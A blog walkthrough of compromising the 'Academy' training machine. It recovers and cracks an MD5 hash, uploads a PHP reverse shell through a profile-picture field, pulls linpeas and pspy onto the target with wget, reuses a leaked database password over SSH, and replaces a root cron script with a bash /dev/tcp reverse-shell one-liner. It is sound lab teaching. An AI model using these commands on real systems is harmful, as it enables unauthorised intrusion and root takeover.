EXPLOITING ACADEMY MACHINE WITH PRIVILEDGE ESCALATION

babsarena

Babs

Posted on June 6, 2024

EXPLOITING ACADEMY MACHINE WITH PRIVILEDGE ESCALATION

In this walkthrough, we'll explore privilege escalation techniques in a controlled environment. We'll simulate a scenario where we have low-level access to a system and attempt to gain higher privileges. This process will be conducted ethically on a dedicated training machine to understand attacker methodologies and bolster our system defence knowledge.

After successfully setting up your academy machine, use the following details to login to the machine.

Username: root
Password: tcm

Image description

Now we need to get the IP address of the academy machine, to get that input the command:



dhclient



Enter fullscreen mode Exit fullscreen mode

after that input the command:



ip a


Enter fullscreen mode Exit fullscreen mode

Image description

From the above image, my IP address for academy is 192.168.59.134

Now we can ping the machine to confirm that both our academy and kali machine are alive and communicating.

For that we use the command:



ping 192.168.59.134 -c2


Enter fullscreen mode Exit fullscreen mode

NB- your IP address would be different from mine so make sure to note your IP address and ping it.

Image description

The image above shows both machines can communicate as no packets were lost.

Next we run NMAP scan to search for open ports using the command:



nmap -p- -A 192.168.59.134


Enter fullscreen mode Exit fullscreen mode

Image description

From the above scan, 3 ports are open, port 21, 22 and 80.

Also note that I indicated note.txt seen on port 21, that's because I am interested in getting the txt file since it was shown to us from our scan.

NB- Moving forward, create an academy directory so you can store all files needed for this lab, so as not to have all files scattered around.

Image description

Port 21 is being used by an ftp server which allows anonymous login, so to login, we input the command:



ftp 192.168.59.134


Enter fullscreen mode Exit fullscreen mode

NB- remember to change the IP address

After entering the command, input anonymous for both username and password.

Once you have successfully logged in, input the command below to get the note.txt file.



get note.txt


Enter fullscreen mode Exit fullscreen mode

Image description

That's all you need to do to get the file, the next thing to do now is to exit ftp and view the txt file, to exit ftp use the command:



exit



Enter fullscreen mode Exit fullscreen mode

Once you have successfully exited ftp, now we need to view what is inside the note.txt file and for that we use the command:



cat note.txt


Enter fullscreen mode Exit fullscreen mode

Image description

The file shows a message from jdelta, telling Heath about Grimme which contains a text about a student's record.

Here's what each data point likely represents:

StudentRegno: 10201321 (Likely a unique student identification number)
studentPhoto: '' (Empty, indicating no photo uploaded)
password: 'cd73502828457d15655bbd7a63fb0bc8' (This is a hashed password, not the original password for security reasons)
studentName: 'Rum Ham' (Student's name)
pincode: '777777' (Possibly a student identification code)
session: '' (Empty, might be session year or term)
department: '' (Empty)
semester: '' (Empty)
cgpa: '7.60' (Student's CGPA - likely Cumulative Grade Point Average)
creationdate: '2021-05-29 14:36:56' (Date and time the record was created)
updationDate: '' (Empty, might be filled when the record is updated)

Now that we have a likely username and password to login into a website which we currently have no idea what the website is.
The first thing we do is input the machine's IP address into a web browser.
Mine still remains 192.168.59.134, so that is what I input into my web browser.

Image description

That's the page it led me to and there's no space for login details, so there must be a login page attached to that IP address.
To find that we can use what is known as dirb-buster or ffuf
For this lab I'd make use of FFUF using the command:



ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.59.134/FUZZ


Enter fullscreen mode Exit fullscreen mode

The above command will search for web directories associated with that IP address.

Image description

It found two web directories which are academy and phpmyadmin

Now, we go to our web-browser and input:



192.168.59.134/academy


Enter fullscreen mode Exit fullscreen mode

NB- remember to change the IP address to yours

Image description
I have successfully found the login page and from the note.txt file I was given the details to use for the login which are:

StudentRegno: 10201321
password: cd73502828457d15655bbd7a63fb0bc8

Image description

The details shows invalid because the password given is not an actual password, it was actually the password hash, which means we need to crack the hash to find out what the actual password is.

To crack the hash, we need to create a file and save the password hash into the file.
To create the password file we'd use nano , so input the command:



nano hashes.txt


Enter fullscreen mode Exit fullscreen mode

Paste the hash in the terminal

Image description

Now press ctrl x on your keyboard to save

Image description
Now press Y on your keyboard to save
The below command will change like the image seen below, press the enter key on your keyboard to save the file.

Image description

Now the hash as been saved as a file named hashes.txt.

To crack the hash we first need to identify what type of hash it is, and we do that using the command:



hash-identifier 


Enter fullscreen mode Exit fullscreen mode

and now we paste the hash

Image description

From the image above the hash is said to be an md5 hash.
knowing that we press ctrl c to quit the hash-identifier and input the command:



hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt 


Enter fullscreen mode Exit fullscreen mode

It will reveal the real password to us.
If you have cracked the password before and couldn't see the password, input the command:



hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --show


Enter fullscreen mode Exit fullscreen mode

Image description

The password would reveal itself.
We can also use another method to crack the hash if we do not want to use hashcat.

To crack the hash, visit "https://crackstation.net/" on your web browser and input the hash in the box provided and click on crack hashes.

Image description

The hashed password was revealed to be student.

Now we can login with the details:

StudentRegno: 10201321
password: student

Image description

Login successful!

NB- There's no need to change the password, just click on "my profile" on the web page.

Image description

We can see from the web-browser that the website is making use of PHP programming language.
We can also see that there's a place to upload image which is empty, the plan now is to see if we can upload something other than an image in there.
What we plan on uploading is a script which is a reverse shell so as to give us a connection here.

From here, go to google and search for "php reverse shell"

Image description

Click on the one from pentestmonkey github

Image description

Click on php-reverse-shell.php

Image description

Click on Raw
Now copy everything by pressing the ctrl A and ctrl C on your keyboard and save it as a file named shell.php.

To save the file, input the command:



nano shell.php



Enter fullscreen mode Exit fullscreen mode

Now paste all that you have copied.
NB- Scroll down and find where you can see CHANGE THIS

Image description

Change the IP address to your attacking machine's IP address (not the academy IP address)
You can leave the port number as it is as 1234.

Once that has been changed, save the file.

Now input the command:



nc -nvlp 1234


Enter fullscreen mode Exit fullscreen mode

once you've inputted that command, what you need to do is upload the shell.php file where the upload image is and click on update, to make sure the changes has saved.

No image will be displayed but you would have gotten a shell on your listener.

Image description
The image above shows the listener before the image upload

Image description

The image above shows the listener after the image upload.

We have successfully popped a shell.

To find out who we are on the machine, we input the command:



whoami


Enter fullscreen mode Exit fullscreen mode

Image description

We are a low level user known as www-data, so our job here is not done because we do not have super user privilege, so we need to find a way to escalate the user to a super user like an admin or root.

To do that we are going to use a tool called "linpeas"
Linpeas is an automation tool that helps us in searching for any sort of privilege escalation.

To use linpeas visit the website "https://linpeas.sh/"

Image description

Now we need to copy everything seen on the linpeas page and save it in a file.
To do that we use "ctrl A" to mark all and "ctrl C" to copy.
Then we need to open a new tab on our kali and use nano to paste what we copied and save it.

To save my linpeas file I created a new directory called "transfer" and saved the linpeas there.
NB- you can choose to create a new directory if you wish, or just save the file in your current directory.

To save the linpeas file we copied from the webpage, we input the command:



nano linpeas.sh


Enter fullscreen mode Exit fullscreen mode

and then we paste the copied text and save the file.

Image description

The file has been saved on our local device, so now we need to find a way to send the linpeas.sh file into the remote shell we accessed in which we are the www-data user.
To do that we need to host a web-server in the directory where the linpeas file was saved and use wget to get the file.

So on the tab where the linpeas file is saved, input the command:



python3 -m http.server 80


Enter fullscreen mode Exit fullscreen mode

Image description

Now move back to the www-data user tab and cd into the tmp folder using the command:



cd tmp


Enter fullscreen mode Exit fullscreen mode

so as to have the file saved in the tmp folder, now we input the command below to get the linpeas file:



wget http://192.168.59.131/linpeas.sh


Enter fullscreen mode Exit fullscreen mode

Image description

Now we need to make the file executable and we do that by using the command:



chmod +x linpeas.sh


Enter fullscreen mode Exit fullscreen mode

Image description

and now we run the linpeas file using the command:



./linpeas.sh


Enter fullscreen mode Exit fullscreen mode

There are lots of things to scroll through after running the above command, but for us what stands out and calls for our attention is a file that it shows us and also a password as shown in the image below

Image description

From the image above we can spot this:



/var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";
/var/www/html/academy/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";


Enter fullscreen mode Exit fullscreen mode

The /var/www/html/academy/includes/ is a directory and config.php is a file, so to check the content of the file we input the command:



cat /var/www/html/academy/includes/config.php


Enter fullscreen mode Exit fullscreen mode

and we get the following response as shown in the image below:

Image description

The image above is showing us that there's a sql user named grimmie with a password of My_V3ryS3cur3_P4ss

So now we open a new tab and try login into the machine as grimmie using ssh with the command:



ssh grimmie@192.168.59.134 


Enter fullscreen mode Exit fullscreen mode

If it asks you about a fingerprint input the command yes
For the password input:



My_V3ryS3cur3_P4ss


Enter fullscreen mode Exit fullscreen mode

Image description

we have successfully logged in as grimmie.

According to the command cat

/etc/passwd

grimmie is an administrator on the machine.

Image description

Grimmie is an administrator but yet we still do not have sudo(super user) privilege after inputting the command:



sudo -l


Enter fullscreen mode Exit fullscreen mode

Image description

So our work here isn't done.
After inputting the command



ls


Enter fullscreen mode Exit fullscreen mode

and



cat backup.sh


Enter fullscreen mode Exit fullscreen mode

Image description

What we can see is that there's a script running periodic backup and after seeing that we would like to know the time it takes for the backup to occur because we plan on editing the script to run a particular command for us, so we need to know if the backup is running per hour, per day, per week or whatever time it takes to run.

First we input the command:



crontab -l


Enter fullscreen mode Exit fullscreen mode

Image description
From the results gotten, grimmie does not have access to crontab, if grimmie had access to crontab we would have been able to edit how frequently the backup should be taking place, because we plan on running a script as soon as possible and would not like to wait till a particular day or week before the script can be executed.

Also we can use the command:



systemctl list-timers


Enter fullscreen mode Exit fullscreen mode

to see if there's any script running on a timer but from the output gotten we cannot find any.

Image description

When we have a situation like this we can use a tool called pspy.
Pspy is a tool that would give us more information about what processes are running than what our devices has been showing us so far.

To download pspy, we search google for pspy and select the one seen from the image below.

Image description

Scroll down and download the 64 bit pspy

Image description

The pspy64 should be located in your download folder on kali, locate your download folder and find the pspy64 and host a webserver in the directory that contains the pspy64 and use wget on grimmie's tab to get the pspy64.

After locating the directory that contains the pspy64 (which should be your downloads folder), input the command in that directory:



python3 -m http.server 80


Enter fullscreen mode Exit fullscreen mode

Image description

and on grimmie's tab, you can move into the tmp folder using the command cd

/tmp

so as to store the file in the tmp folder and input the command:



wget http://192.168.59.131/pspy64


Enter fullscreen mode Exit fullscreen mode

Now that the pspy64 file has been downloaded, we need to make it executable by using the command:



chmod +x pspy64 


Enter fullscreen mode Exit fullscreen mode

Image description

Now we execute the file using the command:



./pspy64


Enter fullscreen mode Exit fullscreen mode

After a while we can see that the backup.sh file is actually running in the background

Image description

The backup is actually programmed to run every minute, which is good news for us, now we can move on to editing the backup script.

Image description
The image above is a confirmation of the time it takes for the backup script to run.

Now we need to go back to our directory that has the backup file.
To do that we input the command:



cd /home/grimmie


Enter fullscreen mode Exit fullscreen mode

Now we go to google and search for bash reverse shell one liner

Select the one from pentestmonkey as shown below

Image description

The image below shows the bash we need, it is a one line reverse shell script.

Image description

Now copy the script which is:



bash -i >& /dev/tcp/10.0.0.1/8080 0>&1


Enter fullscreen mode Exit fullscreen mode

and change the 10.0.0.1 to your attacker/local machine, remember mine is 192.168.59.131, so mine would look like this:



bash -i >& /dev/tcp/192.168.59.131/8080 0>&1


Enter fullscreen mode Exit fullscreen mode

First we need to set up a listener and to set that up, we open a new tab and use the command:



nc -nvlp 8080


Enter fullscreen mode Exit fullscreen mode

After setting up the listener we need to edit the backup.sh script to our bash one liner script.
To do that we go back to our grimmie tab and input the command:
nano backup.sh
`

Clear the backup script and input the one liner script just as shown in the image below.

Image description

and save the file.

Image description

Within a minute a root shell was gotten while while waiting for the file to execute.

Image description

Congratulations!
We have successfully rooted the machine.

💖 💪 🙅 🚩
babsarena
Babs

Posted on June 6, 2024

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related